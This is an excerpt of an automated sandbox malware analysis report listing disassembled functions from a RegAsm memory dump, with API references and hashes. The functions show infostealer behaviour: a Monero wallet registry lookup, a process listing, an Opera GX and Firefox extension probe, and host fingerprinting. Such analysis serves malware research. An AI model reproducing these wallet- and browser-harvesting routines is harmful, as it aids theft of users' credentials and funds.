                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                        • String ID: ^userContextId=4294967295$moz-extension+++
                                                        • API String ID: 161838763-3310892237
                                                        • Opcode ID: 82470315e55af1af15506eb793679b4566f568cdd7711fbc3886a0dc45f2195b
                                                        • Instruction ID: 24583a49aff6281baa4968a6e5c862444f47d9340dd6772fe4890f5a019d339a
                                                        • Opcode Fuzzy Hash: 82470315e55af1af15506eb793679b4566f568cdd7711fbc3886a0dc45f2195b
                                                        • Instruction Fuzzy Hash: 55511372900118AACF14FBA7DD56DED7778AF54308F40093AF806B21D1FF38AA19C666
                                                        Function 0041296A Relevance: 6.1, APIs: 4, Instructions: 79sleepsynchronizationthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(000003E8,?,0041351E,?,?,00421690,00421414,00421EE4), ref: 004129DF
                                                        • _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                        • CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                        • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateObjectOpenSingleSleepThreadWait
                                                        • String ID:
                                                        • API String ID: 1990444757-0
                                                        • Opcode ID: b815f0478008c0fb27b071b7df6fa562c3e6a7cf00d3179eeec24c275660c190
                                                        • Instruction ID: 5c135a3615b2af4bc9ea01f057e38a001bd8d51b1c1a442701784a46b2500e82
                                                        • Opcode Fuzzy Hash: b815f0478008c0fb27b071b7df6fa562c3e6a7cf00d3179eeec24c275660c190
                                                        • Instruction Fuzzy Hash: 7C21C3B1901108EBCB10EF92DD82CDE3BB8FF15304F50452BF806A2151DB78AA45CFA4
                                                        Function 0040EE28 Relevance: 6.1, APIs: 4, Instructions: 55processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EE50
                                                        • Process32First.KERNEL32(00000000,00000128), ref: 0040EE60
                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0040EEB6
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040EEC1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
                                                        • String ID:
                                                        • API String ID: 907984538-0
                                                        • Opcode ID: 158436d3bcf8c8220c443e9a328a96603beb73bae3d00b2444846bb3c92ee16d
                                                        • Instruction ID: 2ca5f4c7045ff68986802c338e4b11129441b3a6ae487e9d555aca0c03aaa317
                                                        • Opcode Fuzzy Hash: 158436d3bcf8c8220c443e9a328a96603beb73bae3d00b2444846bb3c92ee16d
                                                        • Instruction Fuzzy Hash: 85016571A00018ABCB11EB57DC06BEE777DAB58B44F40086BF506F21D1DB785A168BE9
                                                        Function 0040E9FB Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00421690,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00421690), ref: 0040EA0F
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00421690,00000000,?), ref: 0040EA16
                                                        • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EA34
                                                        • RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,000000FF,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EA50
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3676486918-0
                                                        • Opcode ID: 02571363786ade991ff9c84adb140a2822ba013f7303d948782fa02734ff48dd
                                                        • Instruction ID: 86318dd020e91785b76e5375a984614a9b188b4f8d0bd773945e29c7eb579539
                                                        • Opcode Fuzzy Hash: 02571363786ade991ff9c84adb140a2822ba013f7303d948782fa02734ff48dd
                                                        • Instruction Fuzzy Hash: BBF0D076640204BFEB105F91DC0AF9E7ABAFB84705F101065F601A51A0D6B19950DF64
                                                        Function 004012A0 Relevance: 6.0, APIs: 4, Instructions: 35memoryregistryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012B4
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012BB
                                                        • RegOpenKeyExA.KERNEL32(000000FF,00000000,00000000,00020119,?,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012D4
                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF,?,?,?,00401C8F,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 004012ED
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocOpenProcessQueryValue
                                                        • String ID:
                                                        • API String ID: 3676486918-0
                                                        • Opcode ID: fa07465728cac138705ccf2aab452d8ae82d73dc2f4e3d8d807fe03a28bfb9ea
                                                        • Instruction ID: 95434afad9f6f741f917a758d3798dee3983d9233a11da2d446083f1bf3b6c2f
                                                        • Opcode Fuzzy Hash: fa07465728cac138705ccf2aab452d8ae82d73dc2f4e3d8d807fe03a28bfb9ea
                                                        • Instruction Fuzzy Hash: 75F0DA75640208BFEB119F91DC0AFAE7BBAFB84705F101064F601A51A0D7B19A50DFA0
                                                        Function 0040FCC2 Relevance: 4.5, APIs: 3, Instructions: 43fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,0041131F,?), ref: 0040FCE2
                                                        • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041131F,?), ref: 0040FD09
                                                        • CloseHandle.KERNEL32(00000000,?,?,0041131F,?), ref: 0040FD20
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleWrite
                                                        • String ID:
                                                        • API String ID: 1065093856-0
                                                        • Opcode ID: 5504c8d9bd8a762b4dccfe164a8fce7da0a458e44597c1e6a4fbe4989abf97c7
                                                        • Instruction ID: 9a817567a75c718bea68e8c4d2211e82688bd6c5100303715386f0678f54eba4
                                                        • Opcode Fuzzy Hash: 5504c8d9bd8a762b4dccfe164a8fce7da0a458e44597c1e6a4fbe4989abf97c7
                                                        • Instruction Fuzzy Hash: 6CF06271100118BFEF10AFA5DC86EEB376CEF11398F104536F903A21D1EB759D09AAA5
                                                        Function 6C0C3060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C0C3095
                                                          • Part of subcall function 6C0C35A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C14F688,00001000), ref: 6C0C35D5
                                                          • Part of subcall function 6C0C35A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C0C35E0
                                                          • Part of subcall function 6C0C35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C0C35FD
                                                          • Part of subcall function 6C0C35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C0C363F
                                                          • Part of subcall function 6C0C35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C0C369F
                                                          • Part of subcall function 6C0C35A0: __aulldiv.LIBCMT ref: 6C0C36E4
                                                        • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C0C309F
                                                          • Part of subcall function 6C0E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B85
                                                          • Part of subcall function 6C0E5B50: EnterCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5B90
                                                          • Part of subcall function 6C0E5B50: LeaveCriticalSection.KERNEL32(6C14F688,?,?,?,6C0E56EE,?,00000001), ref: 6C0E5BD8
                                                          • Part of subcall function 6C0E5B50: GetTickCount64.KERNEL32 ref: 6C0E5BE4
                                                        • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C0C30BE
                                                          • Part of subcall function 6C0C30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C0C3127
                                                          • Part of subcall function 6C0C30F0: __aulldiv.LIBCMT ref: 6C0C3140
                                                          • Part of subcall function 6C0FAB2A: __onexit.LIBCMT ref: 6C0FAB30
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2160161677.000000006C0C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C0C0000, based on PE: true
                                                        • Associated: 00000002.00000002.2160145470.000000006C0C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160402022.000000006C13D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160444302.000000006C14E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                        • Associated: 00000002.00000002.2160466647.000000006C152000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c0c0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                        • String ID:
                                                        • API String ID: 4291168024-0
                                                        • Opcode ID: cefcc535dcca2a1ad13b17a884e9f67a4be02d32bb55b0d3931ac6d0b4183f41
                                                        • Instruction ID: 405cbc55cd8ee56103a274bf84afadb9df85405016ca4646ee7e85ac96beaf12
                                                        • Opcode Fuzzy Hash: cefcc535dcca2a1ad13b17a884e9f67a4be02d32bb55b0d3931ac6d0b4183f41
                                                        • Instruction Fuzzy Hash: BFF0D622E2074496CB10FF7498412EAB3B1EF6F21CF109729E86853611FB2071D99386
                                                        Function 0040FB2A Relevance: 4.5, APIs: 3, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000,00421414), ref: 0040FB3E
                                                        • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FB59
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB60
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseFileHandleModuleNameOpenProcess
                                                        • String ID:
                                                        • API String ID: 3183270410-0
                                                        • Opcode ID: 895fa0ddac9a564f3c37ca168dfcb881daf6c2785e5c3292fdc852753606113b
                                                        • Instruction ID: ae3fac8ffea12e5bbdd33d03e2113f9c7fad743fa24249391c62342dd283cfd1
                                                        • Opcode Fuzzy Hash: 895fa0ddac9a564f3c37ca168dfcb881daf6c2785e5c3292fdc852753606113b
                                                        • Instruction Fuzzy Hash: 79E06575901118B7DF20AF60DC45FD93769AB05754F004461FF05AA1D0D6F4DA84CFE4
                                                        Function 0040E828 Relevance: 4.5, APIs: 3, Instructions: 22memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040104D,HAL9TH,0041586A), ref: 0040E834
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,0040104D,HAL9TH,0041586A), ref: 0040E83B
                                                        • GetComputerNameA.KERNEL32(00000000,?), ref: 0040E84F
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$AllocComputerNameProcess
                                                        • String ID:
                                                        • API String ID: 4203777966-0
                                                        • Opcode ID: fbf7822b677b5343daa88a93cd139de8911eca1238eb8e9566731ea05cc21ee6
                                                        • Instruction ID: 09c565de07071665dc6ff32083d87aeae69b29ca8f03e691d785811af5b9108b
                                                        • Opcode Fuzzy Hash: fbf7822b677b5343daa88a93cd139de8911eca1238eb8e9566731ea05cc21ee6
                                                        • Instruction Fuzzy Hash: 49E086B9300204AFE7105BABDD4DBCB7ABCD788751F004075FB05D2190D6F089004674
                                                        Function 0040C5F6 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 321COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • StrCmpCA.SHLWAPI(00000000,Opera GX,0041E266,0041E266,?,?), ref: 0040C62B
                                                          • Part of subcall function 0040F84D: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0040F87B
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 0040F81D: GetFileAttributesA.KERNEL32(00000000,?,?,0040AF3A,?,?,?,?), ref: 0040F82A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                        • String ID: Opera GX
                                                        • API String ID: 1719890681-3280151751
                                                        • Opcode ID: 57eba4dd77e2eb8924b19426857dfb4d1f08f888298972e05e6e285fb8db5cd4
                                                        • Instruction ID: 7a80444b055bcfcccd21e46af284f947f8c9439eff63fb5f9ecec9776ccc210a
                                                        • Opcode Fuzzy Hash: 57eba4dd77e2eb8924b19426857dfb4d1f08f888298972e05e6e285fb8db5cd4
                                                        • Instruction Fuzzy Hash: D0B1C072900118AACF14FBA2DD52DDE777DAF14308F50093BF906B21D1EE396B19CA69
                                                        Function 00406592 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,004066C1), ref: 00406611
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
